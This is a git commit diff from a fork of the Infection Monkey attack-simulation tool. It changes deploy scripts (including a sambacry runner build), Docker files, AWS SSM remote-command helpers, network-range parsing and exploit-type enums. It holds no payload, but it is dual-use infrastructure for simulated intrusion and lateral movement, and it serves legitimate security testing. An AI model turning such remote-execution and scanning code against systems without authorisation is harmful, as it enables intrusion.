forked from p15670423/monkey
Merge branch 'develop' into MonkeyZoo
This commit is contained in:
commit
313b1532b1
|
@ -69,6 +69,9 @@ bin
|
||||||
/monkey/monkey_island/cc/server.csr
|
/monkey/monkey_island/cc/server.csr
|
||||||
/monkey/monkey_island/cc/ui/node_modules/
|
/monkey/monkey_island/cc/ui/node_modules/
|
||||||
|
|
||||||
|
# User files
|
||||||
|
/monkey/monkey_island/cc/userUploads
|
||||||
|
|
||||||
# MonkeyZoo
|
# MonkeyZoo
|
||||||
# Network status files
|
# Network status files
|
||||||
MonkeyZoo/*
|
MonkeyZoo/*
|
||||||
|
@ -78,3 +81,5 @@ MonkeyZoo/*
|
||||||
!MonkeyZoo/README.MD
|
!MonkeyZoo/README.MD
|
||||||
!MonkeyZoo/config.tf
|
!MonkeyZoo/config.tf
|
||||||
!MonkeyZoo/MonkeyZooDocs.pdf
|
!MonkeyZoo/MonkeyZooDocs.pdf
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -41,6 +41,8 @@ Setup
|
||||||
-------------------------------
|
-------------------------------
|
||||||
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
|
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
|
||||||
|
|
||||||
|
The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
|
||||||
|
|
||||||
|
|
||||||
Building the Monkey from source
|
Building the Monkey from source
|
||||||
-------------------------------
|
-------------------------------
|
||||||
|
|
|
@ -121,7 +121,7 @@ openssl req -new -key cc/server.key -out cc/server.csr \
|
||||||
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
|
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
|
||||||
|
|
||||||
|
|
||||||
chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
||||||
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
||||||
|
|
||||||
# Install npm
|
# Install npm
|
||||||
|
@ -142,16 +142,16 @@ npm run dist
|
||||||
log_message "Installing monkey requirements"
|
log_message "Installing monkey requirements"
|
||||||
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
|
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
|
||||||
cd ${monkey_home}/monkey/infection_monkey || handle_error
|
cd ${monkey_home}/monkey/infection_monkey || handle_error
|
||||||
python -m pip install --user -r requirements.txt || handle_error
|
python -m pip install --user -r requirements_linux.txt || handle_error
|
||||||
|
|
||||||
# Build samba
|
# Build samba
|
||||||
log_message "Building samba binaries"
|
log_message "Building samba binaries"
|
||||||
sudo apt-get install gcc-multilib
|
sudo apt-get install gcc-multilib
|
||||||
cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
|
cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
|
||||||
chmod +x ./build.sh || handle_error
|
sudo chmod +x ./build.sh || handle_error
|
||||||
./build.sh
|
./build.sh
|
||||||
|
|
||||||
chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
|
sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
|
||||||
|
|
||||||
log_message "Deployment script finished."
|
log_message "Deployment script finished."
|
||||||
exit 0
|
exit 0
|
||||||
|
|
|
@ -39,7 +39,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
|
||||||
New-Item -ItemType directory -path $binDir
|
New-Item -ItemType directory -path $binDir
|
||||||
"Bin directory added"
|
"Bin directory added"
|
||||||
}
|
}
|
||||||
|
|
||||||
# We check if python is installed
|
# We check if python is installed
|
||||||
try
|
try
|
||||||
{
|
{
|
||||||
|
@ -72,7 +72,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
|
||||||
"Downloading Visual C++ Compiler for Python 2.7 ..."
|
"Downloading Visual C++ Compiler for Python 2.7 ..."
|
||||||
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
|
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
|
||||||
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
|
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
|
||||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
||||||
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
|
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
|
||||||
|
|
||||||
# Install requirements for island
|
# Install requirements for island
|
||||||
|
@ -86,7 +86,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
|
||||||
}
|
}
|
||||||
& python -m pip install --user -r $islandRequirements
|
& python -m pip install --user -r $islandRequirements
|
||||||
# Install requirements for monkey
|
# Install requirements for monkey
|
||||||
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements.txt"
|
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
|
||||||
& python -m pip install --user -r $monkeyRequirements
|
& python -m pip install --user -r $monkeyRequirements
|
||||||
|
|
||||||
# Download mongodb
|
# Download mongodb
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
*.md
|
|
@ -1,19 +1,24 @@
|
||||||
FROM debian:jessie-slim
|
FROM debian:stretch-slim
|
||||||
|
|
||||||
LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
|
LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
|
||||||
|
|
||||||
|
ARG RELEASE=1.6
|
||||||
|
ARG DEBIAN_FRONTEND=noninteractive
|
||||||
|
|
||||||
|
EXPOSE 5000
|
||||||
|
|
||||||
WORKDIR /app
|
WORKDIR /app
|
||||||
|
|
||||||
ADD https://github.com/guardicore/monkey/releases/download/1.5.2/infection_monkey_1.5.2_deb.tgz .
|
ADD https://github.com/guardicore/monkey/releases/download/${RELEASE}/infection_monkey_deb.${RELEASE}.tgz .
|
||||||
|
|
||||||
RUN tar xvf infection_monkey_1.5.2_deb.tgz \
|
RUN tar xvf infection_monkey_deb.${RELEASE}.tgz \
|
||||||
&& apt-get -yqq update \
|
&& apt-get -yqq update \
|
||||||
&& apt-get -yqq upgrade \
|
&& apt-get -yqq upgrade \
|
||||||
&& apt-get -yqq install python-pip \
|
&& apt-get -yqq install python-pip \
|
||||||
libssl-dev \
|
python-dev \
|
||||||
supervisor \
|
&& dpkg -i *.deb \
|
||||||
&& dpkg -i *.deb
|
&& rm -f *.deb *.tgz
|
||||||
|
|
||||||
COPY stack.conf /etc/supervisor/conf.d/stack.conf
|
WORKDIR /var/monkey
|
||||||
|
ENTRYPOINT ["/var/monkey/monkey_island/bin/python/bin/python"]
|
||||||
ENTRYPOINT [ "supervisord", "-n", "-c", "/etc/supervisor/supervisord.conf" ]
|
CMD ["/var/monkey/monkey_island.py"]
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
version: '3.3'
|
||||||
|
|
||||||
|
services:
|
||||||
|
db:
|
||||||
|
image: mongo:4
|
||||||
|
restart: always
|
||||||
|
volumes:
|
||||||
|
- db_data:/data/db
|
||||||
|
environment:
|
||||||
|
MONGO_INITDB_DATABASE: monkeyisland
|
||||||
|
monkey:
|
||||||
|
depends_on:
|
||||||
|
- db
|
||||||
|
build: .
|
||||||
|
image: monkey:latest
|
||||||
|
ports:
|
||||||
|
- "5000:5000"
|
||||||
|
environment:
|
||||||
|
MONGO_URL: mongodb://db:27017/monkeyisland
|
||||||
|
|
||||||
|
volumes:
|
||||||
|
db_data:
|
|
@ -1,4 +0,0 @@
|
||||||
[program:mongod]
|
|
||||||
command=/var/monkey_island/bin/mongodb/bin/mongod --quiet --dbpath /var/monkey_island/db
|
|
||||||
[program:monkey]
|
|
||||||
command=/var/monkey_island/ubuntu/systemd/start_server.sh
|
|
|
@ -1,17 +0,0 @@
|
||||||
import urllib2
|
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
|
||||||
|
|
||||||
|
|
||||||
class AWS(object):
|
|
||||||
def __init__(self):
|
|
||||||
try:
|
|
||||||
self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id').read()
|
|
||||||
except urllib2.URLError:
|
|
||||||
self.instance_id = None
|
|
||||||
|
|
||||||
def get_instance_id(self):
|
|
||||||
return self.instance_id
|
|
||||||
|
|
||||||
def is_aws_instance(self):
|
|
||||||
return self.instance_id is not None
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
import re
|
||||||
|
import urllib2
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class AwsInstance(object):
|
||||||
|
def __init__(self):
|
||||||
|
try:
|
||||||
|
self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id', timeout=2).read()
|
||||||
|
self.region = self._parse_region(
|
||||||
|
urllib2.urlopen('http://169.254.169.254/latest/meta-data/placement/availability-zone').read())
|
||||||
|
except urllib2.URLError:
|
||||||
|
self.instance_id = None
|
||||||
|
self.region = None
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _parse_region(region_url_response):
|
||||||
|
# For a list of regions: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
|
||||||
|
# This regex will find any AWS region format string in the response.
|
||||||
|
re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
|
||||||
|
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
|
||||||
|
if finding:
|
||||||
|
return finding[0]
|
||||||
|
else:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def get_instance_id(self):
|
||||||
|
return self.instance_id
|
||||||
|
|
||||||
|
def get_region(self):
|
||||||
|
return self.region
|
||||||
|
|
||||||
|
def is_aws_instance(self):
|
||||||
|
return self.instance_id is not None
|
|
@ -0,0 +1,63 @@
|
||||||
|
import boto3
|
||||||
|
from botocore.exceptions import ClientError
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class AwsService(object):
|
||||||
|
"""
|
||||||
|
Supplies various AWS services
|
||||||
|
"""
|
||||||
|
|
||||||
|
access_key_id = None
|
||||||
|
secret_access_key = None
|
||||||
|
region = None
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def set_auth_params(access_key_id, secret_access_key):
|
||||||
|
AwsService.access_key_id = access_key_id
|
||||||
|
AwsService.secret_access_key = secret_access_key
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def set_region(region):
|
||||||
|
AwsService.region = region
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_client(client_type, region=None):
|
||||||
|
return boto3.client(
|
||||||
|
client_type,
|
||||||
|
aws_access_key_id=AwsService.access_key_id,
|
||||||
|
aws_secret_access_key=AwsService.secret_access_key,
|
||||||
|
region_name=region if region is not None else AwsService.region)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_session():
|
||||||
|
return boto3.session.Session(
|
||||||
|
aws_access_key_id=AwsService.access_key_id,
|
||||||
|
aws_secret_access_key=AwsService.secret_access_key)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_regions():
|
||||||
|
return AwsService.get_session().get_available_regions('ssm')
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def test_client():
|
||||||
|
try:
|
||||||
|
AwsService.get_client('ssm').describe_instance_information()
|
||||||
|
return True
|
||||||
|
except ClientError:
|
||||||
|
return False
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_instances():
|
||||||
|
return \
|
||||||
|
[
|
||||||
|
{
|
||||||
|
'instance_id': x['InstanceId'],
|
||||||
|
'name': x['ComputerName'],
|
||||||
|
'os': x['PlatformType'].lower(),
|
||||||
|
'ip_address': x['IPAddress']
|
||||||
|
}
|
||||||
|
for x in AwsService.get_client('ssm').describe_instance_information()['InstanceInformationList']
|
||||||
|
]
|
||||||
|
|
|
@ -0,0 +1,26 @@
|
||||||
|
from common.cmd.cmd_result import CmdResult
|
||||||
|
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class AwsCmdResult(CmdResult):
|
||||||
|
"""
|
||||||
|
Class representing an AWS command result
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, command_info):
|
||||||
|
super(AwsCmdResult, self).__init__(
|
||||||
|
self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'],
|
||||||
|
command_info[u'StandardErrorContent'])
|
||||||
|
self.command_info = command_info
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def is_successful(command_info, is_timeout=False):
|
||||||
|
"""
|
||||||
|
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
|
||||||
|
:param command_info: Command info struct (returned by ssm.get_command_invocation)
|
||||||
|
:param is_timeout: Whether the given command timed out
|
||||||
|
:return: True if successful, False otherwise.
|
||||||
|
"""
|
||||||
|
return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress'))
|
|
@ -0,0 +1,42 @@
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from common.cloud.aws_service import AwsService
|
||||||
|
from common.cmd.aws.aws_cmd_result import AwsCmdResult
|
||||||
|
from common.cmd.cmd_runner import CmdRunner
|
||||||
|
from common.cmd.cmd_status import CmdStatus
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class AwsCmdRunner(CmdRunner):
|
||||||
|
"""
|
||||||
|
Class for running commands on a remote AWS machine
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, is_linux, instance_id, region = None):
|
||||||
|
super(AwsCmdRunner, self).__init__(is_linux)
|
||||||
|
self.instance_id = instance_id
|
||||||
|
self.region = region
|
||||||
|
self.ssm = AwsService.get_client('ssm', region)
|
||||||
|
|
||||||
|
def query_command(self, command_id):
|
||||||
|
return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
|
||||||
|
|
||||||
|
def get_command_result(self, command_info):
|
||||||
|
return AwsCmdResult(command_info)
|
||||||
|
|
||||||
|
def get_command_status(self, command_info):
|
||||||
|
if command_info[u'Status'] == u'InProgress':
|
||||||
|
return CmdStatus.IN_PROGRESS
|
||||||
|
elif command_info[u'Status'] == u'Success':
|
||||||
|
return CmdStatus.SUCCESS
|
||||||
|
else:
|
||||||
|
return CmdStatus.FAILURE
|
||||||
|
|
||||||
|
def run_command_async(self, command_line):
|
||||||
|
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
|
||||||
|
command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]},
|
||||||
|
InstanceIds=[self.instance_id])
|
||||||
|
return command_res['Command']['CommandId']
|
|
@ -0,0 +1,11 @@
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class Cmd(object):
|
||||||
|
"""
|
||||||
|
Class representing a command
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, cmd_runner, cmd_id):
|
||||||
|
self.cmd_runner = cmd_runner
|
||||||
|
self.cmd_id = cmd_id
|
|
@ -0,0 +1,13 @@
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class CmdResult(object):
|
||||||
|
"""
|
||||||
|
Class representing a command result
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, is_success, status_code=None, stdout=None, stderr=None):
|
||||||
|
self.is_success = is_success
|
||||||
|
self.status_code = status_code
|
||||||
|
self.stdout = stdout
|
||||||
|
self.stderr = stderr
|
|
@ -0,0 +1,158 @@
|
||||||
|
import time
|
||||||
|
import logging
|
||||||
|
from abc import abstractmethod
|
||||||
|
|
||||||
|
from common.cmd.cmd import Cmd
|
||||||
|
from common.cmd.cmd_result import CmdResult
|
||||||
|
from common.cmd.cmd_status import CmdStatus
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class CmdRunner(object):
|
||||||
|
"""
|
||||||
|
Interface for running commands on a remote machine
|
||||||
|
|
||||||
|
Since these classes are a bit complex, I provide a list of common terminology and formats:
|
||||||
|
* command line - a command line. e.g. 'echo hello'
|
||||||
|
* command - represent a single command which was already run. Always of type Cmd
|
||||||
|
* command id - any unique identifier of a command which was already run
|
||||||
|
* command result - represents the result of running a command. Always of type CmdResult
|
||||||
|
* command status - represents the current status of a command. Always of type CmdStatus
|
||||||
|
* command info - Any consistent structure representing additional information of a command which was already run
|
||||||
|
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
|
||||||
|
* instance_id - any unique identifier of an instance (machine). Can be of any format
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Default command timeout in seconds
|
||||||
|
DEFAULT_TIMEOUT = 5
|
||||||
|
# Time to sleep when waiting on commands.
|
||||||
|
WAIT_SLEEP_TIME = 1
|
||||||
|
|
||||||
|
def __init__(self, is_linux):
|
||||||
|
self.is_linux = is_linux
|
||||||
|
|
||||||
|
def run_command(self, command_line, timeout=DEFAULT_TIMEOUT):
|
||||||
|
"""
|
||||||
|
Runs the given command on the remote machine
|
||||||
|
:param command_line: The command line to run
|
||||||
|
:param timeout: Timeout in seconds for command.
|
||||||
|
:return: Command result
|
||||||
|
"""
|
||||||
|
c_id = self.run_command_async(command_line)
|
||||||
|
return self.wait_commands([Cmd(self, c_id)], timeout)[1]
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def run_multiple_commands(instances, inst_to_cmd, inst_n_cmd_res_to_res):
|
||||||
|
"""
|
||||||
|
Run multiple commands on various instances
|
||||||
|
:param instances: List of instances.
|
||||||
|
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
|
||||||
|
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
|
||||||
|
and returns a parsed result (of any format)
|
||||||
|
:return: Dictionary with 'instance_id' as key and parsed result as value
|
||||||
|
"""
|
||||||
|
command_instance_dict = {}
|
||||||
|
|
||||||
|
for instance in instances:
|
||||||
|
command = inst_to_cmd(instance)
|
||||||
|
command_instance_dict[command] = instance
|
||||||
|
|
||||||
|
instance_results = {}
|
||||||
|
command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys())
|
||||||
|
for command, result in command_result_pairs:
|
||||||
|
instance = command_instance_dict[command]
|
||||||
|
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
|
||||||
|
|
||||||
|
return instance_results
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
def run_command_async(self, command_line):
|
||||||
|
"""
|
||||||
|
Runs the given command on the remote machine asynchronously.
|
||||||
|
:param command_line: The command line to run
|
||||||
|
:return: Command ID (in any format)
|
||||||
|
"""
|
||||||
|
raise NotImplementedError()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def wait_commands(commands, timeout=DEFAULT_TIMEOUT):
|
||||||
|
"""
|
||||||
|
Waits on all commands up to given timeout
|
||||||
|
:param commands: list of commands (of type Cmd)
|
||||||
|
:param timeout: Timeout in seconds for command.
|
||||||
|
:return: commands and their results (tuple of Command and CmdResult)
|
||||||
|
"""
|
||||||
|
init_time = time.time()
|
||||||
|
curr_time = init_time
|
||||||
|
|
||||||
|
results = []
|
||||||
|
|
||||||
|
while (curr_time - init_time < timeout) and (len(commands) != 0):
|
||||||
|
for command in list(commands): # list(commands) clones the list. We do so because we remove items inside
|
||||||
|
CmdRunner._process_command(command, commands, results, True)
|
||||||
|
|
||||||
|
time.sleep(CmdRunner.WAIT_SLEEP_TIME)
|
||||||
|
curr_time = time.time()
|
||||||
|
|
||||||
|
for command in list(commands):
|
||||||
|
CmdRunner._process_command(command, commands, results, False)
|
||||||
|
|
||||||
|
for command, result in results:
|
||||||
|
if not result.is_success:
|
||||||
|
logger.error('The following command failed: `%s`. status code: %s',
|
||||||
|
str(command[1]), str(result.status_code))
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
def query_command(self, command_id):
|
||||||
|
"""
|
||||||
|
Queries the already run command for more info
|
||||||
|
:param command_id: The command ID to query
|
||||||
|
:return: Command info (in any format)
|
||||||
|
"""
|
||||||
|
raise NotImplementedError()
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
def get_command_result(self, command_info):
|
||||||
|
"""
|
||||||
|
Gets the result of the already run command
|
||||||
|
:param command_info: The command info of the command to get the result of
|
||||||
|
:return: CmdResult
|
||||||
|
"""
|
||||||
|
raise NotImplementedError()
|
||||||
|
|
||||||
|
@abstractmethod
|
||||||
|
def get_command_status(self, command_info):
|
||||||
|
"""
|
||||||
|
Gets the status of the already run command
|
||||||
|
:param command_info: The command info of the command to get the result of
|
||||||
|
:return: CmdStatus
|
||||||
|
"""
|
||||||
|
raise NotImplementedError()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _process_command(command, commands, results, should_process_only_finished):
|
||||||
|
"""
|
||||||
|
Removes the command from the list, processes its result and appends to results
|
||||||
|
:param command: Command to process. Must be in commands.
|
||||||
|
:param commands: List of unprocessed commands.
|
||||||
|
:param results: List of command results.
|
||||||
|
:param should_process_only_finished: If True, processes only if command finished.
|
||||||
|
:return: None
|
||||||
|
"""
|
||||||
|
c_runner = command.cmd_runner
|
||||||
|
c_id = command.cmd_id
|
||||||
|
try:
|
||||||
|
command_info = c_runner.query_command(c_id)
|
||||||
|
if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
|
||||||
|
commands.remove(command)
|
||||||
|
results.append((command, c_runner.get_command_result(command_info)))
|
||||||
|
except Exception:
|
||||||
|
logger.exception('Exception while querying command: `%s`', str(c_id))
|
||||||
|
if not should_process_only_finished:
|
||||||
|
commands.remove(command)
|
||||||
|
results.append((command, CmdResult(False)))
|
|
@ -0,0 +1,9 @@
|
||||||
|
from enum import Enum
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class CmdStatus(Enum):
|
||||||
|
IN_PROGRESS = 0
|
||||||
|
SUCCESS = 1
|
||||||
|
FAILURE = 2
|
|
@ -5,9 +5,12 @@ from abc import ABCMeta, abstractmethod
|
||||||
|
|
||||||
import ipaddress
|
import ipaddress
|
||||||
from six import text_type
|
from six import text_type
|
||||||
|
import logging
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class NetworkRange(object):
|
class NetworkRange(object):
|
||||||
__metaclass__ = ABCMeta
|
__metaclass__ = ABCMeta
|
||||||
|
@ -47,12 +50,23 @@ class NetworkRange(object):
|
||||||
address_str = address_str.strip()
|
address_str = address_str.strip()
|
||||||
if not address_str: # Empty string
|
if not address_str: # Empty string
|
||||||
return None
|
return None
|
||||||
if -1 != address_str.find('-'):
|
if NetworkRange.check_if_range(address_str):
|
||||||
return IpRange(ip_range=address_str)
|
return IpRange(ip_range=address_str)
|
||||||
if -1 != address_str.find('/'):
|
if -1 != address_str.find('/'):
|
||||||
return CidrRange(cidr_range=address_str)
|
return CidrRange(cidr_range=address_str)
|
||||||
return SingleIpRange(ip_address=address_str)
|
return SingleIpRange(ip_address=address_str)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def check_if_range(address_str):
|
||||||
|
if -1 != address_str.find('-'):
|
||||||
|
ips = address_str.split('-')
|
||||||
|
try:
|
||||||
|
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
|
||||||
|
except ValueError as e:
|
||||||
|
return False
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _ip_to_number(address):
|
def _ip_to_number(address):
|
||||||
return struct.unpack(">L", socket.inet_aton(address))[0]
|
return struct.unpack(">L", socket.inet_aton(address))[0]
|
||||||
|
@ -111,13 +125,58 @@ class IpRange(NetworkRange):
|
||||||
class SingleIpRange(NetworkRange):
|
class SingleIpRange(NetworkRange):
|
||||||
def __init__(self, ip_address, shuffle=True):
|
def __init__(self, ip_address, shuffle=True):
|
||||||
super(SingleIpRange, self).__init__(shuffle=shuffle)
|
super(SingleIpRange, self).__init__(shuffle=shuffle)
|
||||||
self._ip_address = ip_address
|
self._ip_address, self.domain_name = self.string_to_host(ip_address)
|
||||||
|
|
||||||
def __repr__(self):
|
def __repr__(self):
|
||||||
return "<SingleIpRange %s>" % (self._ip_address,)
|
return "<SingleIpRange %s>" % (self._ip_address,)
|
||||||
|
|
||||||
|
def __iter__(self):
|
||||||
|
"""
|
||||||
|
We have to check if we have an IP to return, because user could have entered invalid
|
||||||
|
domain name and no IP was found
|
||||||
|
:return: IP if there is one
|
||||||
|
"""
|
||||||
|
if self.ip_found():
|
||||||
|
yield self._number_to_ip(self.get_range()[0])
|
||||||
|
|
||||||
def is_in_range(self, ip_address):
|
def is_in_range(self, ip_address):
|
||||||
return self._ip_address == ip_address
|
return self._ip_address == ip_address
|
||||||
|
|
||||||
def _get_range(self):
|
def _get_range(self):
|
||||||
return [SingleIpRange._ip_to_number(self._ip_address)]
|
return [SingleIpRange._ip_to_number(self._ip_address)]
|
||||||
|
|
||||||
|
def ip_found(self):
|
||||||
|
"""
|
||||||
|
Checks if we could translate domain name entered into IP address
|
||||||
|
:return: True if dns found domain name and false otherwise
|
||||||
|
"""
|
||||||
|
return self._ip_address
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def string_to_host(string):
|
||||||
|
"""
|
||||||
|
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
|
||||||
|
:param string: String that was entered in "Scan IP/subnet list"
|
||||||
|
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
|
||||||
|
"""
|
||||||
|
# The most common use case is to enter ip/range into "Scan IP/subnet list"
|
||||||
|
domain_name = ''
|
||||||
|
|
||||||
|
# Make sure to have unicode string
|
||||||
|
user_input = string.decode('utf-8', 'ignore')
|
||||||
|
|
||||||
|
# Try casting user's input as IP
|
||||||
|
try:
|
||||||
|
ip = ipaddress.ip_address(user_input).exploded
|
||||||
|
except ValueError:
|
||||||
|
# Exception means that it's a domain name
|
||||||
|
try:
|
||||||
|
ip = socket.gethostbyname(string)
|
||||||
|
domain_name = string
|
||||||
|
except socket.error:
|
||||||
|
LOG.error("Your specified host: {} is not found as a domain name and"
|
||||||
|
" it's not an IP address".format(string))
|
||||||
|
return None, string
|
||||||
|
# If a string was entered instead of IP we presume that it was domain name and translate it
|
||||||
|
return ip, domain_name
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,10 @@
|
||||||
|
from enum import Enum
|
||||||
|
|
||||||
|
|
||||||
|
class ScanStatus(Enum):
|
||||||
|
# Technique wasn't scanned
|
||||||
|
UNSCANNED = 0
|
||||||
|
# Technique was attempted/scanned
|
||||||
|
SCANNED = 1
|
||||||
|
# Technique was attempted and succeeded
|
||||||
|
USED = 2
|
|
@ -0,0 +1,7 @@
|
||||||
|
from enum import Enum
|
||||||
|
|
||||||
|
|
||||||
|
class ExploitType(Enum):
|
||||||
|
VULNERABILITY = 1
|
||||||
|
OTHER = 8
|
||||||
|
BRUTE_FORCE = 9
|
|
@ -1,2 +1,2 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
pyinstaller --clean monkey-linux.spec
|
pyinstaller -F --log-level=DEBUG --clean monkey.spec
|
||||||
|
|
|
@ -7,8 +7,6 @@ from abc import ABCMeta
|
||||||
from itertools import product
|
from itertools import product
|
||||||
import importlib
|
import importlib
|
||||||
|
|
||||||
importlib.import_module('infection_monkey', 'network')
|
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
GUID = str(uuid.getnode())
|
GUID = str(uuid.getnode())
|
||||||
|
@ -22,6 +20,7 @@ class Configuration(object):
|
||||||
# now we won't work at <2.7 for sure
|
# now we won't work at <2.7 for sure
|
||||||
network_import = importlib.import_module('infection_monkey.network')
|
network_import = importlib.import_module('infection_monkey.network')
|
||||||
exploit_import = importlib.import_module('infection_monkey.exploit')
|
exploit_import = importlib.import_module('infection_monkey.exploit')
|
||||||
|
post_breach_import = importlib.import_module('infection_monkey.post_breach')
|
||||||
|
|
||||||
unknown_items = []
|
unknown_items = []
|
||||||
for key, value in formatted_data.items():
|
for key, value in formatted_data.items():
|
||||||
|
@ -35,12 +34,12 @@ class Configuration(object):
|
||||||
if key == 'finger_classes':
|
if key == 'finger_classes':
|
||||||
class_objects = [getattr(network_import, val) for val in value]
|
class_objects = [getattr(network_import, val) for val in value]
|
||||||
setattr(self, key, class_objects)
|
setattr(self, key, class_objects)
|
||||||
elif key == 'scanner_class':
|
|
||||||
